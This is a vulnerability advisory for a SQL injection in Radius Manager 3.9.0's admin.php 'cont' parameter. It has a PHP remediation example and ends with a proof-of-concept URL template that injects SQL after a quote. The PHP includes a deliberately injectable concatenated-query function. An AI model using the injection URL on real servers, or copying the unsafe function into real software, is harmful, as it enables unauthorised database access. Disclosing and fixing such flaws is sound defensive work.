Radius Manager version 3.9.0 suffers from a remote SQL injection vulnerability.
d7465d1cae603ceb6c99ab6cb16dcc593475dfd9122a239007bd547a0423fc45
# Exploit Title: Radius Manager V3.9.0 Sql Injection
# Date: 16-10-2011
# Author: Mehdi Boukazoula
# Software Link: http://www.dmasoftlab.com
# Version: v 3.9.0
# Tested on: v 3.9.0 with PostgreSQL, PHP 5.2.6, Apache 2.2.8
# Description : In the page "http://127.0.0.1/admin.php" the parameter "cont" is not sanitized, which lets a malicious user communicate directly with the database server.
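The root cause described above is a request parameter reaching the SQL layer unvalidated. The following PHP is an added illustration written for this advisory, not Radius Manager's own code: it shows the concatenation pattern that produces this class of bug next to a hardened dispatcher that treats `cont` as an opaque page selector checked against an allowlist and passes any real search term to PostgreSQL as a bound parameter. All function names, the `invoices` table, the `q` parameter and the connection string are assumptions.

```php
<?php
// Added example, not vendor code. Demonstrates allowlisting the "cont"
// page selector and parameterizing any user-supplied search value.
declare(strict_types=1);

// The only "cont" values this page knows how to handle (assumed names).
const ALLOWED_CONT = ['search_invoices', 'list_users'];

// Returns the selected page name, or null if the value is not on the
// allowlist. Exact, type-strict matching means a value carrying quotes
// or SQL fragments is rejected before any database access happens.
function resolve_cont(array $query): ?string
{
    $cont = $query['cont'] ?? '';
    return in_array($cont, ALLOWED_CONT, true) ? $cont : null;
}

// Vulnerable pattern (illustrative): the search term is spliced into the
// statement text, so the database cannot tell data from SQL.
function search_invoices_unsafe($db, string $term): array
{
    $sql = "SELECT id, total FROM invoices WHERE customer = '" . $term . "'";
    $res = pg_query($db, $sql);
    return $res ? (pg_fetch_all($res) ?: []) : [];
}

// Hardened form: the term travels as parameter $1 and the server parses
// the statement text independently of it.
function search_invoices_safe($db, string $term): array
{
    $res = pg_query_params(
        $db,
        'SELECT id, total FROM invoices WHERE customer = $1',
        [$term]
    );
    return $res ? (pg_fetch_all($res) ?: []) : [];
}

// Minimal dispatcher modelled on an admin.php-style entry point.
$cont = resolve_cont($_GET);
if ($cont === null) {
    http_response_code(400);
    exit('unknown page');
}

$db = pg_connect('host=localhost dbname=radius user=app'); // assumed DSN
if ($db === false) {
    http_response_code(500);
    exit('database unavailable');
}

switch ($cont) {
    case 'search_invoices':
        $term = (string) ($_GET['q'] ?? ''); // assumed search parameter
        header('Content-Type: application/json');
        echo json_encode(search_invoices_safe($db, $term));
        break;
    case 'list_users':
        echo 'user listing would go here';
        break;
}
```

The two defences are independent: the allowlist stops the page-selector parameter from ever being interpreted as SQL, and `pg_query_params` protects the one place where free-form user text legitimately belongs in a query. Escaping the value by hand is not a substitute for either.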
--------------------------------------------------------------------------------------------------------
# Code of exploit :
In the browser (fingerprint PoC), request the URL:
http://HOST/admin.php?cont=cont=search_invoices'YOUR SQL QUERIE